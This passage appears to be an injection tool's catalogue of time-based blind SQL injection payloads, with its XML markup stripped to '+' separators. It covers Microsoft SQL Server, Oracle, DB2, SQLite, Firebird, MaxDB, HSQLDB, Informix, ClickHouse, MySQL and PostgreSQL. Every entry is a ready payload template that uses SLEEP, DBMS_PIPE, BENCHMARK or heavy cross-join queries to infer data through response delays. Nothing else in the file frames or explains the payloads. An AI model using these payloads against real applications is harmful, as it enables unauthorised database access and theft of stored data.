+ + + Microsoft SQL Server/Sybase time-based blind (IF - comment) + 5 + 4 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND time-based blind + 5 + 1 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + IBM DB2 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + HSQLDB > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + Informix AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + Informix OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+
+ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + ClickHouse OR time-based blind (heavy query) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 3 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE) + 5 + 5 + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + + + MySQL >= 5.0.12 time-based blind - Parameter replace + 5 + 2 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) + 5 + 3 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 3 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL time-based blind - Parameter replace (bool) + 5 + 4 + 1 + 1,2,3,9 + 3 + ([INFERENCE] AND SLEEP([SLEEPTIME])) + + ([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (ELT) + 5 + 5 + 1 + 1,2,3,9 + 3 + ELT([INFERENCE],SLEEP([SLEEPTIME])) + + ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL time-based blind - Parameter replace (MAKE_SET) + 5 + 5 + 1 + 1,2,3,9 + 3 + MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) + + MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 time-based blind - Parameter replace + 5 + 3 + 1 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + + Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 1,3,9 + 3 + BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + SQLite > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)) + + (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
